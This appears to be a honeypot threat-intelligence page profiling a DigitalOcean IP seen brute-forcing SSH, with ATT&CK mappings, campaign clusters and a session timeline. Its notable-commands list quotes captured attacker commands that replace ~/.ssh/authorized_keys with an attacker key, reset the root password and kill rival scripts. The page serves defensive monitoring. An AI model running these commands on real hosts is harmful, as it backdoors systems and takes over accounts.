IntrusionLabs IntrusionLabs
← Back to feed

178.128.18.100

TAGGED SUSPICIOUS how we decide →
Threat Confidence
67%
Location
🇸🇬 SG / Singapore
ASN
AS14061 · DigitalOcean, LLC
Cloud Provider
DigitalOcean
Total Events
204
Above average by volume
Agent Count
2
First / Last Seen
2026-04-28 08:15 — 2026-04-28 20:07
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1082 T1083
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-04-28 21:02
blocklist_de:reported
Campaigns
Multi-Agent Scan SCAN Active medium
72 IPs 349963 events
2026-03-13 — ongoing · 72 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
74 IPs 357255 events
2026-03-13 — ongoing · 74 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on DO. Scanning the same …
Multi-Agent Scan SCAN Active medium
109 IPs 355949 events
2026-03-13 — ongoing · 109 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
72 IPs 349770 events
2026-03-13 — ongoing · 72 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on DO. Scanning the same …
Multi-Agent Scan SCAN Active medium
54 IPs 10296 events
2026-03-04 — ongoing · 54 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
HASSH 03a80b21afa8… — SSH-2.0-libssh_0.11.1 (193 IPs, 36 countries) HASSH Active high 🇨🇳 CN
193 IPs 63816 events
ssh:bruteforce
2026-02-27 — ongoing · 193 IPs are running an identical SSH client (HASSH fingerprint 03a80b21afa8…). Top network: China Telecom Group (AS4811). Geographic …
Multi-Agent Scan SCAN Active medium
5 IPs 275 events
2026-02-23 — ongoing · 5 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Session Forensics
malware_dropper ×3 credential_probe ×21 opportunistic_bruter ×2
Sessions
26 (5 with login)
Avg Depth Score
0.32
Commands Executed
26
Files Downloaded
4
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:MB3UJiMCGADk"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
  • ls -lh $(which ls)
  • which ls
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 1af5b46a6ff0 w4m_singapore_01 · 2026-04-28 20:07
1 50%
Loading events...
Malware Dropper 414cadd7ffd0 w4m_singapore_01 · 2026-04-28 20:07
3 1 1 100%
Loading events...
Credential Probe 21fdfa277a5d w4m_singapore_01 · 2026-04-28 20:00
1 20%
Loading events...
Credential Probe 0b85463430dd w4m_singapore_01 · 2026-04-28 19:56
1 20%
Loading events...
Credential Probe d4f67a5ddcd6 w4m_singapore_01 · 2026-04-28 19:50
1 20%
Loading events...
Credential Probe a24a61f03428 w4m_singapore_01 · 2026-04-28 19:47
1 20%
Loading events...
Malware Dropper 25f4418451f9 w4m_singapore_01 · 2026-04-28 19:44
20 2 1 100%
Loading events...
Credential Probe 522c6cb2fb10 w4m_singapore_01 · 2026-04-28 19:44
1 20%
Loading events...
Credential Probe faf7eaadb8ed w4m_singapore_01 · 2026-04-28 19:41
1 20%
Loading events...
Credential Probe 7c5a36cfb9c6 w4m_singapore_01 · 2026-04-28 19:32
1 20%
Loading events...
Credential Probe eda19f3f0ab4 w4m_singapore_01 · 2026-04-28 19:22
1 20%
Loading events...
Credential Probe b521029c02d0 w4m_singapore_01 · 2026-04-28 19:16
1 20%
Loading events...
Credential Probe 59337f0b0174 w4m_singapore_01 · 2026-04-28 19:13
1 20%
Loading events...
Credential Probe 63a471fca95a w4m_singapore_01 · 2026-04-28 19:07
1 20%
Loading events...
Credential Probe 53e0a2831553 w4m_singapore_01 · 2026-04-28 19:00
1 20%
Loading events...
Credential Probe 4ae6a10cda24 w4m_singapore_01 · 2026-04-28 18:56
1 20%
Loading events...
Credential Probe 236aee7d8e98 w4m_singapore_01 · 2026-04-28 18:53
1 20%
Loading events...
Credential Probe f70fad6d283f w4m_singapore_01 · 2026-04-28 18:50
1 20%
Loading events...
Credential Probe 568386bbe89e w4m_singapore_01 · 2026-04-28 18:47
1 20%
Loading events...
Credential Probe 6c5aa5040c90 w4m_singapore_01 · 2026-04-28 18:44
1 20%
Loading events...
Credential Probe bee861bd6ce2 w4m_singapore_01 · 2026-04-28 18:41
1 20%
Loading events...
Credential Probe 16615d0be04b w4m_singapore_01 · 2026-04-28 18:38
1 20%
Loading events...
Credential Probe 0fc6b6b2baff w4m_singapore_01 · 2026-04-28 18:34
1 20%
Loading events...
Opportunistic Bruter a0fd019a6383 w4m_seattle_01 · 2026-04-28 08:15
1 50%
Loading events...
Malware Dropper 596166c57188 w4m_seattle_01 · 2026-04-28 08:15
3 1 1 100%
Loading events...
Credential Probe 7577a96fe9a4 w4m_seattle_01 · 2026-04-28 08:15
1 20%
Loading events...